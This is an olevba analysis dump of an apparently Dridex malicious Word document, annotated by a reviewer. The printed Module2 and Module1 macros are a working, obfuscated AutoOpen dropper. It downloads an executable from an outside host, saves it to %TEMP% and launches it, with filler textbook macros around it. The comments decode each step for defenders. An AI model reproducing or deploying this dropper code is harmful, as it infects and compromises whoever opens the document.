- olevba 0.26 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASI-B- dridex.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: dridex.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: dridex.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Wrapper with a non-ASCII name. Its only statement calls TOT9Qr3J8P, which is defined
- ' in Module2; the FFFFF argument is never read.
- Sub ôñÔÔÀ(FFFFF As Long)
- TOT9Qr3J8P
- End Sub
- ' Auto-exec entry point: olevba flags AutoOpen as running when the Word document is opened.
- ' Call chain visible in this dump: autoopen -> ôñÔÔÀ -> TOT9Qr3J8P.
- Sub autoopen()
- ôñÔÔÀ (3)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: dridex.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- '
- ' NOTE(review): the auto-exec chain shown in this dump (autoopen -> ôñÔÔÀ -> TOT9Qr3J8P)
- ' does not reach this Sub. The object qualifiers Ôû, ä, â and ô used below are not declared
- ' anywhere in the dump, and the Sub works on ThisWorkbook although the container is a .doc,
- ' so this looks like sample code pasted in as filler around the obfuscated functions
- ' WphmxowcstXb, dFlagLB30D and IrQ2IESgmYoy later in this module -- confirm before
- ' spending analysis time here.
- Sub PublishAutoFilterRange()
- Ôû.Sheets("Query").AutoFilterMode = False
- ä.Range("Query_From_Northwind").Select
- â.Range("Query_From_Northwind").AutoFilter _
- Field:=1, _
- Criteria1:="Condiments"
- ThisWorkbook.PublishObjects.Add( _
- SourceType:=xlSourceAutoFilter, _
- FileName:="C:\Publish01.htm", _
- Sheet:="Query", _
- Source:=ô.Sheets("Query").AutoFilter.Range, _
- HtmlType:=xlHtmlStatic, _
- DivID:="ExcelAutoFilter", _
- Title:="Excel AutoFilter Range").Publish True
- End Sub
- '
- ' Publish a chart sheet
- '
- Sub PublishChartSheet()
- ThisWorkbook.PublishObjects.Add( _
- SourceType:=xlSourceChart, _
- FileName:="C:\Publish02.htm", _
- Sheet:="Chart1", _
- HtmlType:=xlHtmlChart, _
- DivID:="ExcelChartSheet", _
- Title:="Excel Chart Sheet").Publish True
- End Sub
- '
- ' Publish an embedded chart
- '
- Sub PublishEmbeddedChart()
- ThisWorkbook.PublishObjects.Add( _
- SourceType:=xlSourceChart, _
- FileName:="C:\Publish03.htm", _
- Sheet:="2000 Budget", _
- Source:="Chart 1", _
- HtmlType:=xlHtmlStatic, _
- DivID:="ExcelEmbeddedChart", _
- Title:="Excel Embedded Chart").Publish True
- End Sub
- '
- ' Publish a PivotTable
- '
- Sub PublishPivotTable()
- ThisWorkbook.PublishObjects.Add( _
- SourceType:=xlSourcePivotTable, _
- FileName:="C:\Publish04.htm", _
- Sheet:="PivotTable", _
- Source:="PivotTable1", _
- HtmlType:=xlHtmlList, _
- DivID:="ExcelPivotTable", _
- Title:="Excel PivotTable").Publish True
- End Sub
- '
- ' Publish a print area
- '
- Sub PublishPrintArea()
- ç.Worksheets("2000 Budget").PageSetup.PrintArea = "A1:B13"
- ThisWorkbook.PublishObjects.Add( _
- SourceType:=xlSourcePrintArea, _
- FileName:="C:\Publish05.htm", _
- Sheet:="2000 Budget", _
- Source:=ôâ.Worksheets("2000 Budget").PageSetup.PrintArea, _
- HtmlType:=xlHtmlStatic, _
- DivID:="ExcelPrintArea", _
- Title:="Excel Print Area").Publish True
- End Sub
- '
- ' Publish a query table
- '
- Sub PublishQueryTable()
- ThisWorkbook.PublishObjects.Add( _
- SourceType:=xlSourceQuery, _
- FileName:="C:\Publish06.htm", _
- Sheet:="Query", _
- Source:="Query from Northwind", _
- HtmlType:=xlHtmlCalc, _
- DivID:="ExcelQueryTable", _
- Title:="Excel Query Table").Publish True
- End Sub
- '
- ' Publish a range using coordinates
- '
- Sub PublishRangeCoordinates()
- ThisWorkbook.PublishObjects.Add( _
- SourceType:=xlSourceRange, _
- FileName:="C:\Publish07.htm", _
- Sheet:="2000 Budget", _
- Source:="A1:B17", _
- HtmlType:=xlHtmlCalc, _
- DivID:="ExcelRangeCoordinates", _
- Title:="Excel Range Coordinates").Publish True
- End Sub
- '
- ' Publish a range using a name
- '
- Sub PublishRangeName()
- ThisWorkbook.PublishObjects.Add( _
- SourceType:=xlSourceRange, _
- FileName:="C:\Publish08.htm", _
- Source:="Expenses", _
- HtmlType:=xlHtmlStatic, _
- DivID:="ExcelRangeName", _
- Title:="Excel Range Name").Publish True
- End Sub
- ' Execution step of the dropper. The Chr() concatenation evaluates to the ProgID
- ' "Shell.Application", which is instantiated through the dFlagLB30D wrapper.
- ' The A7X71OY4p parameter is never read. The path passed to .Open is QrDNQZQRP, the
- ' Public string declared in Module2 and assigned in TOT9Qr3J8P.
- Public Function WphmxowcstXb(A7X71OY4p As String)
- Set zBo1iklWv9Sz = dFlagLB30D("S" & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & "c" & "a" & Chr(116) & Chr(105) & "o" & Chr(110))
- ' NOTE(review): presumably launches the file that TOT9Qr3J8P wrote to QrDNQZQRP -- confirm in a sandbox.
- zBo1iklWv9Sz.Open (QrDNQZQRP)
- End Function
- ' Thin wrapper around CreateObject. Every obfuscated routine in this dump creates its
- ' COM objects through it, with the ProgID built from Chr() calls at run time, so no
- ' ProgID literal appears next to a CreateObject call in the payload code.
- ' Returns the created object for the ProgID given in HvbtyGByuxg3J.
- Public Function dFlagLB30D(HvbtyGByuxg3J As String)
- Set dFlagLB30D = CreateObject(HvbtyGByuxg3J)
- End Function
- ' File-drop step: writes the data in UNIWVVc542vt to the path in cNvH4h9GxP.
- ' The Chr() concatenation evaluates to the ProgID "Adodb.Stream".
- ' Called from TOT9Qr3J8P with the HTTP response body and the QrDNQZQRP path.
- Public Function IrQ2IESgmYoy(UNIWVVc542vt As Variant, cNvH4h9GxP As String)
- Dim oUeKB2dS: Set oUeKB2dS = dFlagLB30D(Chr(65) & "d" & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & "t" & Chr(114) & Chr(101) & "a" & "m")
- With oUeKB2dS
- ' Type 1 is adTypeBinary: the stream holds raw bytes, not text.
- .Type = 1
- .Open
- .write UNIWVVc542vt
- ' Option 2 is adSaveCreateOverWrite: an existing file at that path is replaced.
- .savetofile cNvH4h9GxP, 2
- End With
- End Function
- '
- ' Publish a worksheet
- '
- Sub PublishWorksheet()
- ThisWorkbook.PublishObjects.Add( _
- SourceType:=xlSourceSheet, _
- FileName:="C:\Publish09.htm", _
- Sheet:="2000 Budget", _
- HtmlType:=xlHtmlCalc, _
- DivID:="ExcelWorksheet", _
- Title:="Excel Worksheet").Publish True
- End Sub
- '
- ' Listing 20.2. Republishing a PublishObject.
- '
- Sub RepublishObject()
- Dim strID As String
- strID = "ExcelRangeCoordinates"
- For Each po In ThisWorkbook.PublishObjects
- If po.DivID = strID Then
- po.Publish
- Exit For
- End If
- Next 'po
- End Sub
- '
- ' Listing 20.3. A procedure that deletes all the PublishObjects
- '
- Sub DeletePublishObjects()
- For Each po In ThisWorkbook.PublishObjects
- po.Delete
- Next 'po
- End Sub
- '
- ' Listing 20.4. A procedure that adds a Hyperlink object.
- '
- Sub AddLink()
- Dim r As Range
- '
- ' Add a paragraph to the end of the document
- '
- With ThisDocument.Paragraphs
- .Item(.Count).Range.InsertParagraphAfter
- Set r = .Item(.Count).Range
- End With
- r.Text = "Sams' Home Page"
- r.Hyperlinks.Add _
- Anchor:=r, _
- Address:="http://www.mcp.com/sams/", _
- ScreenTip:="Click here to visit the home page of Sams!"
- End Sub
- '
- ' Listing 20.5. Procedures that add a link for the Yahoo!
- ' search engine and run a query on the Yahoo! database.
- '
- Sub AddYahoo()
- Dim r As Range
- '
- ' Add a paragraph to the end of the document
- '
- With ThisDocument.Paragraphs
- .Item(.Count).Range.InsertParagraphAfter
- Set r = .Item(.Count).Range
- End With
- r.Text = "Yahoo Search"
- r.Hyperlinks.Add _
- Anchor:=r, _
- Address:="http://search.yahoo.com/bin/search"
- End Sub
- Sub SearchYahoo()
- Dim link As Hyperlink
- Dim keyword As String
- Set link = ThisDocument.Hyperlinks("http://search.yahoo.com/bin/search")
- keyword = InputBox("Enter a search keyword:")
- link.Follow _
- ExtraInfo:="p=" & keyword, _
- Method:=msoMethodGet
- End Sub
- '
- ' Listing 20.6. Using the FollowHyperlink method to display
- ' a target document without an existing Hyperlink object.
- '
- Sub FollowHyperlinkTest()
- Dim keyword As String
- keyword = InputBox("Enter a search keyword:")
- ThisDocument.FollowHyperlink _
- Address:="http://search.yahoo.com/bin/search", _
- ExtraInfo:="p=" & keyword, _
- Method:=msoMethodGet
- End Sub
- '
- ' Listing 20.7. Some event handlers that are used to
- ' display a Web page.
- '
- ' This event handler fires when you first open the form
- '
- Private Sub UserForm_Initialize()
- Dim maxWidth As Integer
- Dim maxHeight As Integer
- With webWWW
- '
- ' Display and save the initial URL
- '
- If txtLocation <> "" Then
- topPage = txtLocation
- .Navigate txtLocation
- End If
- '
- ' Adjust the width and height of the control
- '
- maxWidth = Ê.Me.Width - .Left - 10
- maxHeight = Ê.Me.Height - .Top - 20
- If Application.UsableWidth > maxWidth Then
- .Width = maxWidth
- End If
- If Application.UsableHeight > maxHeight Then
- .Height = maxHeight
- End If
- End With
- End Sub
- '
- ' This event handler fires when you enter the text box
- '
- Private Sub txtLocation_Enter()
- '
- ' Make sure Surf! button is the default
- '
- cmdSurf.Default = True
- End Sub
- '
- ' This event handler fires when you click the Surf! button
- '
- Private Sub cmdSurf_Click()
- '
- ' Surf to the URL specified in the Location text box
- '
- If txtLocation <> "" Then
- webWWW.Navigate txtLocation
- Else
- txtLocation.SetFocus
- Beep
- End If
- End Sub
- '
- ' This event handler fires once the Web page navigation is done
- '
- Private Sub webWWW_DocumentComplete(ByVal pDisp As Object, URL As Variant)
- lblProgress.Caption = " Done"
- txtLocation = URL
- End Sub
- '
- ' This event handler fires at the start of the download
- '
- Private Sub webWWW_DownloadBegin()
- lblProgress.Caption = " Downloading..."
- End Sub
- '
- ' This event handler fires when the URL title changes
- '
- Private Sub webWWW_TitleChange(ByVal Text As String)
- '
- ' Update the form's caption to reflect the new title
- '
- ÊMe.Caption = "The Word Wide Web - " & webWWW.LocationName
- End Sub
- '
- ' This event handler fires when the status text changes
- '
- Private Sub webWWW_StatusTextChange(ByVal Text As String)
- lblStatus = Text
- End Sub
- '
- ' Listing 20.8. Event handlers for the navigation
- ' buttons in the custom Web browser.
- '
- '
- ' This event handler fires when you click the Back button
- '
- Private Sub cmdBack_Click()
- '
- ' An error occurs if there is no page to go back to
- '
- On Error Resume Next
- webWWW.GoBack
- End Sub
- '
- ' This event handler fires when you click the Forward button
- '
- Private Sub cmdForward_Click()
- '
- ' An error occurs if there is no page to go forward to
- '
- On Error Resume Next
- webWWW.GoForward
- End Sub
- '
- ' This event handler fires when you click the Top button
- '
- Private Sub cmdTop_Click()
- webWWW.Navigate topPage
- End Sub
- '
- ' This event handler fires when you click the Refresh button
- '
- Private Sub cmdRefresh_Click()
- webWWW.Refresh
- End Sub
- '
- ' This event handler fires when you click the Stop button
- '
- Private Sub cmdStop_Click()
- webWWW.Stop
- End Sub
- '
- ' This event handler fires when you click the Home button
- '
- Private Sub cmdHome_Click()
- webWWW.GoHome
- End Sub
- '
- ' This event handler fires when you click the Search button
- '
- Private Sub cmdSearch_Click()
- webWWW.GoSearch
- End Sub
- '
- ' This event handler fires when you click the Exit button
- '
- Private Sub cmdExit_Click()
- Unload ÊMe
- End Sub
- '
- ' Listing 20.9. A procedure that manipulates Internet Explorer
- ' via Automation using various members of the
- ' InternetExplorer class.
- '
- Sub AutomateInternetExplorer()
- Dim ie As Object
- Dim result As Integer
- '
- ' Set up the Automation object
- '
- Set ie = CreateObject("InternetExplorer.Application")
- '
- ' Navigate to a page and customize the browser window
- '
- ie.Navigate "http://www.microsoft.com/ie/"
- ie.Toolbar = False
- ie.StatusBar = False
- ie.MenuBar = False
- '
- ' Twiddle thumbs while the page loads
- '
- Do While ie.Busy
- DoEvents
- Loop
- '
- ' Display page info
- '
- result = MsgBox( _
- "Current URL: " & ie.LocationURL & Chr(13) & _
- "Current Title: " & ie.LocationName & Chr(13) & _
- "Document type: " & ie.Type & Chr(13) & Chr(13) & _
- "Would you like to view this document?", _
- vbYesNo + vbQuestion)
- If result = vbYes Then
- '
- ' If Yes, make browser visible and activate it
- '
- ie.Visible = True
- AppActivate "Microsoft Internet Explorer"
- Else
- '
- ' If no, bail out
- '
- ie.Quit
- End If
- Set ie = Nothing
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | AppActivate | May control another application by |
- | | | simulating user keystrokes |
- | Suspicious | Run | May run an executable file or a system |
- | | | command |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | http://www.mcp.com/s | URL |
- | | ams/ | |
- | IOC | http://search.yahoo. | URL |
- | | com/bin/search | |
- | IOC | http://www.microsoft | URL |
- | | .com/ie/ | |
- +------------+----------------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: dridex.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Module-level Public string shared across modules: TOT9Qr3J8P (this module) assigns the
- ' drop path to it, and WphmxowcstXb (Module1) passes it to Shell.Application's Open.
- Public QrDNQZQRP As String
- ' Listing 13.4. Using the DDEInitiate method to open a DDE channel.
- '
- Sub TestIt()
- Dim result As Integer
- result = OpenHailingFrequencies
- DDETerminate result
- End Sub
- Function OpenHailingFrequencies() As Integer
- Dim channel As Integer
- On Error GoTo BadConnection
- '
- ' Establish the DDE connection to Program Manager
- '
- channel = DDEInitiate("Progman", "Progman")
- MsgBox "A channel to Program Manager is now open.", vbInformation
- '
- ' Return the channel number
- '
- OpenHailingFrequencies = channel
- Exit Function
- BadConnection:
- MsgBox "Could not open a channel to Program Manager!", vbExclamation
- '
- ' Return 0
- '
- OpenHailingFrequencies = 0
- End Function
- ' Listing 13.5. Using DDEExecute to control a server application.
- '
- Sub CreateWorkbookIcon()
- Dim channel As Integer
- Dim strPath As String, strName As String, strApp As String
- On Error GoTo BadConnection
- '
- ' Get info required for program item
- '
- strPath = ActiveWorkbook.Path & "\" & ActiveWorkbook.Name
- strName = Left(ActiveWorkbook.Name, Len(ActiveWorkbook.Name) - 4)
- strApp = Application.Path & "\Excel.exe"
- '
- ' Establish the DDE connection to Program Manager
- '
- channel = DDEInitiate("Progman", "Progman")
- '
- ' Create the group and item
- '
- DDEExecute channel, "[CreateGroup(""Excel Workbooks"")]"
- DDEExecute channel, "[AddItem(""" & strPath & """,""" & strName & """,""""" & strApp & """"")]"
- DDETerminate channel
- Exit Sub
- BadConnection:
- MsgBox "Could not open a channel to Program Manager!", vbExclamation
- End Sub
- ' Listing 13.6. Using DDERequest to retrieve data from an
- ' application.
- '
- Sub RequestWordData()
- Dim channel As Integer
- Dim wordData As Variant
- Dim getString As String
- On Error GoTo BailOut
- '
- ' Set up the application
- '
- Application.StatusBar = "Starting Word..."
- Application.DisplayAlerts = False
- '
- ' Initiate channel with System topic
- '
- channel = DDEInitiate("Winword", "System")
- '
- ' Open the document we want to work with
- '
- Application.StatusBar = "Opening Word document..."
- DDEExecute channel, "[FileOpen ""C:\My Documents\Chaptr13.doc""]"
- DDETerminate channel
- '
- ' Initiate new channel with document
- '
- channel = DDEInitiate("Winword", "C:\My Documents\Chaptr13.doc")
- '
- ' Find keyword and add a bookmark
- '
- DDEExecute channel, "[StartOfDocument]"
- DDEExecute channel, "[EditFind .Find = ""ACME""]"
- DDEExecute channel, "[SelectCurSentence]"
- DDEExecute channel, "[EditBookmark .Name = ""Gotcha""]"
- '
- ' Retrieve the bookmark and store it
- '
- wordData = DDERequest(channel, "Gotcha")
- getString = wordData(1)
- r.Worksheets("Sheet1").[A2].Value = getString
- '
- ' Quit Word and terminate channel
- '
- DDEExecute channel, "[FileExit 1]"
- DDETerminate channel
- Exit Sub
- BailOut:
- DDETerminate channel
- MsgBox "DDE operation failed!", vbExclamation
- End Sub
- ' Listing 13.7. Using DDEPoke to send data to an application.
- '
- Sub SendDataToWord()
- Dim channel As Integer, pokeData As Variant
- On Error GoTo BailOut
- '
- ' Set up the application
- '
- Application.StatusBar = "Starting Word..."
- Application.DisplayAlerts = False
- '
- ' Initiate channel with System topic
- '
- channel = DDEInitiate("Winword", "System")
- '
- ' Open the document we want to work with
- '
- Application.StatusBar = "Opening Word document..."
- DDEExecute channel, "[FileOpen ""C:\My Documents\Chaptr13.doc""]"
- DDETerminate channel
- '
- ' Initiate new channel with document
- '
- channel = DDEInitiate("Winword", "C:\My Documents\Chaptr13.doc")
- '
- 'Get the data to be sent
- '
- Application.StatusBar = "Sending data..."
- Set pokeData = t.Worksheets("Sheet1").[A1]
- '
- 'Send it to the "Gotcha" bookmark
- '
- DDEPoke channel, "Gotcha", pokeData
- '
- ' Quit Word and terminate channel
- '
- Application.StatusBar = "Shutting down Word..."
- DDEExecute channel, "[FileExit 1]"
- DDETerminate channel
- Application.StatusBar = False
- Exit Sub
- BailOut:
- DDETerminate channel
- MsgBox "DDE operation failed!", vbExclamation
- Application.StatusBar = False
- End Sub
- ' Listing 15.3. Using Automation to run a PowerPoint
- ' presentation slide show.
- '
- ' NOTE(review): this is the payload routine reached from autoopen (ThisDocument) via ôñÔÔÀ.
- ' The "Listing 15.3" comment directly above is filler text that describes RunPresentation,
- ' not this Sub. Every string is assembled from Chr() calls and members are invoked through
- ' CallByName, so object names, method names, the URL and the drop path never appear as
- ' literals. Decoded values are given per statement below (URL defanged).
- ' The IOC rows in olevba's ANALYSIS tables on this page list only URLs and a file name
- ' taken from the filler code; the download URL and drop path decoded here are not among them.
- ' Artefacts a defender can look for: an HTTP GET from the Office process to the host
- ' below, and creation of biksenpd.exe in the user's %TEMP% directory.
- Sub TOT9Qr3J8P()
- ' ProgID decodes to "Microsoft.XMLHTTP"; dFlagLB30D (Module1) wraps CreateObject.
- Set j9yPFDVwyo = dFlagLB30D("Mi" & Chr(99) & "r" & Chr(111) & Chr(115) & "o" & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & "L" & Chr(72) & "TT" & Chr(80))
- ' Decodes to: .Open "GET", hxxp://colchester-institute[.]com/708/346.exe, False
- ' (the trailing False makes the request synchronous).
- CallByName j9yPFDVwyo, Chr(79) & Chr(112) & "e" & "n", VbMethod, Chr(71) & Chr(69) & Chr(84), _
- Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(99) & Chr(111) & "l" & Chr(99) & Chr(104) & Chr(101) & Chr(115) & Chr(116) & Chr(101) & Chr(114) & Chr(45) & Chr(105) & Chr(110) & Chr(115) & Chr(116) & Chr(105) & Chr(116) & Chr(117) & Chr(116) & Chr(101) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & "7" & Chr(48) & Chr(56) & Chr(47) & Chr(51) & Chr(52) & Chr(54) & Chr(46) & Chr(101) & Chr(120) & "e" _
- , False
- ' ProgID decodes to "WScript.Shell".
- Set nVoYwy5wi65Ru = dFlagLB30D("W" & Chr(83) & Chr(99) & Chr(114) & "i" & Chr(112) & Chr(116) & Chr(46) & Chr(83) & "h" & "e" & Chr(108) & Chr(108))
- ' Decodes to the .Environment property read with the argument "Process".
- Set Njvhw3SCwhJF = CallByName(nVoYwy5wi65Ru, Chr(69) & Chr(110) & Chr(118) & Chr(105) & "r" & Chr(111) & Chr(110) & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & "r" & Chr(111) & Chr(99) & Chr(101) & "s" & Chr(115))
- ' Looks up the "TEMP" environment variable.
- NkFurzJgA4 = Njvhw3SCwhJF(Chr(84) & "E" & Chr(77) & Chr(80))
- ' Drop path = <TEMP> & "\biksenpd.exe", stored in the Public variable QrDNQZQRP.
- QrDNQZQRP = NkFurzJgA4 & Chr(92) & Chr(98) & Chr(105) & "k" & Chr(115) & Chr(101) & Chr(110) & Chr(112) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
- Dim yRG5Tmsczw() As Byte
- ' Decodes to the .Send method: issues the GET prepared above.
- CallByName j9yPFDVwyo, "S" & "e" & Chr(110) & Chr(100), VbMethod
- ' Decodes to the .responseBody property: the response bytes go into the byte array.
- yRG5Tmsczw = CallByName(j9yPFDVwyo, "r" & Chr(101) & Chr(115) & Chr(112) & "o" & Chr(110) & Chr(115) & Chr(101) & Chr(66) & Chr(111) & "d" & Chr(121), VbGet)
- ' IrQ2IESgmYoy (Module1) writes the bytes to QrDNQZQRP through Adodb.Stream.
- ' No HTTP status or content check is visible before the write.
- IrQ2IESgmYoy yRG5Tmsczw, QrDNQZQRP
- ' The division by zero below is deliberate: it forces a jump to the ehUAReVao5 handler,
- ' so the execution call sits only on the error path rather than in the straight-line flow.
- On Error GoTo ehUAReVao5
- a = 197 / 0
- On Error GoTo 0
- PBWxy1g8qJuzYK:
- Exit Sub
- ehUAReVao5:
- ' WphmxowcstXb (Module1) ignores this string argument and calls Shell.Application's
- ' Open on QrDNQZQRP.
- WphmxowcstXb ("HBaMqGixX")
- Resume PBWxy1g8qJuzYK
- End Sub
- Sub RunPresentation()
- On Error GoTo OpenPowerPoint
- '
- ' Reference the existing PowerPoint Application object
- '
- Set ppApp = GetObject(, "PowerPoint.Application")
- '
- ' Work with PowerPoint's Application object directly
- '
- With ppApp
- '
- ' Display PowerPoint
- '
- .Visible = True
- '
- ' Open and then run the presentation's slide show
- '
- .Presentations.Open "C:\My Documents\Juggling.ppt"
- .Presentations("Juggling.ppt").SlideShowSettings.Run
- End With
- Set ppApp = Nothing
- '
- ' Program branches here if PowerPoint isn't running
- '
- OpenPowerPoint:
- ' Create a new instance of PowerPoint's Application object
- '
- Set ppApp = CreateObject("PowerPoint.Application")
- '
- ' Continue after the statement that caused the error
- '
- Resume Next
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Run | May run an executable file or a system |
- | | | command |
- | Suspicious | CallByName | May attempt to obfuscate malicious |
- | | | function calls |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | Excel.exe | Executable file name |
- +------------+----------------+-----------------------------------------+